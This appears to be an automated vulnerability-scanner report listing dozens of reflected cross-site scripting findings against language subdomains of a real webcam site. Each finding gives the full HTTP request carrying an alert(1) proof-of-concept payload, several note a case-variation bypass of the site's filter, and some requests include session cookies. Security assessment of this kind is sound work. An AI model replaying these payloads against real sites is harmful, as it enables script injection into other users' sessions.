The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8a0cf'onerror%3d'alert(1)'9653cda9fbc was submitted in the gotopage parameter. This input was echoed as 8a0cf'onerror='alert(1)'9653cda9fbc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/8a0cf'onerror%3d'alert(1)'9653cda9fbc HTTP/1.1 Host: ru.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:25:28 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: iru=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDSQSQQASC=MBDGAJMAPJDFGCLMLOHPEKEG; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:25:28 GMT Connection: close Content-Length: 8316 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
2.167. http://se.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://se.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6521b"><ScRiPt>alert(1)</ScRiPt>71abce1a13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /?6521b"><ScRiPt>alert(1)</ScRiPt>71abce1a13=1 HTTP/1.1 Host: se.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="sv-SE" lang="sv-SE" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||6521b"><script>alert(1)</script>71abce1a13~1');return false;"> ...[SNIP]...
2.168. http://se.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://se.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 955da'-alert(1)-'35a7f28024d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?955da'-alert(1)-'35a7f28024d=1 HTTP/1.1 Host: se.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 50044'onerror%3d'alert(1)'c69d85712e5 was submitted in the gotopage parameter. This input was echoed as 50044'onerror='alert(1)'c69d85712e5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=50044'onerror%3d'alert(1)'c69d85712e5 HTTP/1.1 Host: se.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:25:34 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: ise=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDSQRSRDRD=OMEHEKMACGAIHNLGCDDKMGHM; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:25:34 GMT Connection: close Content-Length: 8306 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
2.170. http://tr.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://tr.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2afd4'-alert(1)-'3181e4bce5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?2afd4'-alert(1)-'3181e4bce5=1 HTTP/1.1 Host: tr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="tr-TR" lang="tr-TR" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=tr.imlive.com&ul=/?2afd4'-alert(1)-'3181e4bce5=1&qs=2afd4'-alert(1)-'3181e4bce5=1&qs=2afd4'-alert(1)-'3181e4bce5=1&iy=dallas&id=44&iu=1&vd=59ea87f5-6021-4c78-b7d1-1f922fc6dbd0';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEv ...[SNIP]...
2.171. http://tr.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://tr.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4282"><script>alert(1)</script>18266d653ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?d4282"><script>alert(1)</script>18266d653ee=1 HTTP/1.1 Host: tr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e41c'-alert(1)-'966bdb815ef was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: ar.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=9e41c'-alert(1)-'966bdb815ef
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 803bf'-alert(1)-'0a99d8be53c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: ar.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=803bf'-alert(1)-'0a99d8be53c
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27acf'-alert(1)-'861f82f4c0a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: br.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=27acf'-alert(1)-'861f82f4c0a
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a328'-alert(1)-'eadcfd684a2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: br.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=6a328'-alert(1)-'eadcfd684a2
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97e0d'-alert(1)-'85ef759ec87 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: cafr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=97e0d'-alert(1)-'85ef759ec87
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9536b'-alert(1)-'e58569d4bd5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/ HTTP/1.1 Host: cafr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=9536b'-alert(1)-'e58569d4bd5
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6236'-alert(1)-'6b063b5f82a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: de.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=e6236'-alert(1)-'6b063b5f82a
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e45d9'-alert(1)-'4b50bf8581f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/ HTTP/1.1 Host: de.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=e45d9'-alert(1)-'4b50bf8581f
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c15d'-alert(1)-'545d614c845 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: dk.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=8c15d'-alert(1)-'545d614c845
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58ec0'-alert(1)-'1ca19f61f52 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/ HTTP/1.1 Host: dk.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=58ec0'-alert(1)-'1ca19f61f52
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ef76'-alert(1)-'7097e4ccd25 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: es.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=6ef76'-alert(1)-'7097e4ccd25
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 751a4'-alert(1)-'3e6a4981811 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/ HTTP/1.1 Host: es.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=751a4'-alert(1)-'3e6a4981811
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8655a'-alert(1)-'b1450d4e902 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: fr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=8655a'-alert(1)-'b1450d4e902
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82729'-alert(1)-'0751f493bff was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: fr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=82729'-alert(1)-'0751f493bff
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28ad3'-alert(1)-'7c8c16b05d7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: gr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=28ad3'-alert(1)-'7c8c16b05d7
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81a10'-alert(1)-'0b760eb3fe0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/ HTTP/1.1 Host: gr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=81a10'-alert(1)-'0b760eb3fe0
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8adbd'-alert(1)-'4f9aafda70b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=8adbd'-alert(1)-'4f9aafda70b
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c53c'-alert(1)-'71f23548084 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /GuestDiscountClubs.aspx HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=3c53c'-alert(1)-'71f23548084
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:25:00 GMT Connection: close Content-Length: 40625 Vary: Accept-Encoding
